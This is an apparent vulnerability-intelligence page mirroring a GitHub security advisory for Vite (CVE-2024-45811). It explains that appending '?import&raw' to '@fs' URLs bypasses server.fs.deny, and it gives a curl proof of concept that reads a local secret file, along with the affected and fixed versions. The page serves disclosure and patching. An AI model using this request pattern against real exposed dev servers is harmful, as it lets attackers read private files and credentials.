Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-9cwx-2883-4wfx

GitHub Security Advisory

Vite's `server.fs.deny` is bypassed when using `?import&raw`

✓ GitHub Reviewed MODERATE Has CVE
View on GitHub

Advisory Details

### Summary
The contents of arbitrary files can be returned to the browser.

### Details
`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.

### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"

<body>
<h1>403 Restricted</h1>
<p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

Affected Packages

npm vite
Affected versions: 5.4.0 (fixed in 5.4.6)
npm vite
Affected versions: 5.3.0 (fixed in 5.3.6)
npm vite
Affected versions: 5.2.0 (fixed in 5.2.14)
npm vite
Affected versions: 4.0.0 (fixed in 4.5.4)
npm vite
Affected versions: 0 (fixed in 3.2.11)
npm vite
Affected versions: 5.0.0 (fixed in 5.1.8)

Related CVEs

CVE-2024-45811

Key Information

GHSA ID
GHSA-9cwx-2883-4wfx
Published
September 17, 2024 6:44 PM
Last Modified
September 19, 2024 6:34 PM
CVSS Score
5.0 /10
Primary Ecosystem
npm
Primary Package
vite
GitHub Reviewed
✓ Yes

Dataset

Last updated: September 16, 2025 6:29 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.